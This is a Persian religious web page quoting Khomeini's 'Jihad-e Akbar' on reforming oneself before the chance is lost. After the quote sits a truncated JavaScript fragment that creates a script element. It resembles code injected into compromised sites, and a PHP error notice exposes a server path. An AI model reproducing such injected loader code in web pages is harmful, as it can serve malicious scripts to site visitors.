تا فرصت هست استفاده کنید

پیش از آنکه فرصت از دست برود چاره بیندیشید!
نفحات صبح؛ اگر بشر با اعمال و کردار خویش آتش نیفروزد، جهنم خاموش است. باطن این طبیعت جهنم است؛ اقبال به طبیعت اقبال به جهنم است. آنچه در عالم آخرت واقع می‏شود چیزی است که در این دنیا تهیه گردیده است. پیش از آنکه فرصت از دست برود چاره بیندیشید! شما جوانان رو به پیری و ما پیران رو به مرگ پیش می‏رویم. هر نفسی که می‏کشید، هر قدمی که برمی‏دارید، و هر لحظه‏ای که از عمر شما می‏گذرد، اصلاح مشکل تر گردیده، ممکن است ظلمت و تباهی بیشتر شود. تا نیرو و اراده جوانی دارید می‏توانید هواهای نفسانی، مشتهیّات دنیایی و خواسته‏های حیوانی را از خود دور سازید.
(امام خمینی ( ره ) – جهاد اکبر)var d=document;var s=d.createElement(‘script’);


دیدگاه هادیدگاه شما :


Notice: Undefined variable: user_ID in /home/ansarosh/domains/ansaroshohada.ir/public_html/wp-content/themes/ansaroshohada1/comments.php on line 54